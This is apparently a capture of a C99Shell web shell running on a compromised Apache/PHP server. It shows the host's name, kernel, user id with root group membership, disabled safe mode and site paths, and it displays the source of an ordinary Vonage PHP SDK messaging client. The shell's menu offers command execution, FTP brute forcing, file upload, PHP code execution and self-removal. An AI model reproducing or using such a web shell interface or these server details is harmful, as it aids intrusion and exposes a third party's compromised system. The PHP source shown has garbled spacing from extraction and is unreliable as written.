!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/vonage/client-core/src/Messages/   drwxr-xr-x
Free 28.62 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Client.php (2.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Vonage\Messages;

use 
Vonage\Client\APIClient;
use 
Vonage\Client\APIResource;
use 
Vonage\Messages\Channel\BaseMessage;

class 
Client implements APIClient
{
    public const 
RCS_STATUS_REVOKED 'revoked';
    public const 
WHATSAPP_STATUS_READ 'read';

    public function 
__construct(protected APIResource $api)
    {
    }

    public function 
getAPIResource(): APIResource
    
{
        return 
$this->api;
    }

    public function 
send(BaseMessage $message): ?array
    {
        
$messageArray $message->toArray();

        if (
$message->validatesE164()) {
            if (
$this->isValidE164($messageArray['to'])) {
                
$messageArray['to'] = $this->stripLeadingPlus($messageArray['to']);
                return 
$this->getAPIResource()->create($messageArray);
            } else {
                throw new 
\InvalidArgumentException('Number provided is not a valid E164 number');
            }
        }

        return 
$this->getAPIResource()->create($messageArray);
    }

    public function 
updateRcsStatus(string $messageUuidstring $status): bool
    
{
        try {
            
$this->api->partiallyUpdate($messageUuid, ['status' => $status]);
            return 
true;
        } catch (
\Exception $e) {
            return 
false;
        }
    }

    
/**
     * This method is just a wrapper for updateRcsStatus to make it semantically
     * correct for other uses such as WhatsApp messages
     */
    
public function markAsStatus(string $messageUuidstring $status): bool
    
{
        return 
$this->updateRcsStatus($messageUuid$status);
    }

    protected function 
stripLeadingPlus(string $phoneNumber): string
    
{
        if (
str_starts_with($phoneNumber'+')) {
            return 
substr($phoneNumber1);
        }

        return 
$phoneNumber;
    }

    public function 
isValidE164(string $phoneNumber): bool
    
{
        
$phoneNumber $this->stripLeadingPlus($phoneNumber);

        
$regex '/^\+?[1-9]\d{1,14}$/';

        return 
preg_match($regex$phoneNumber) === 1;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--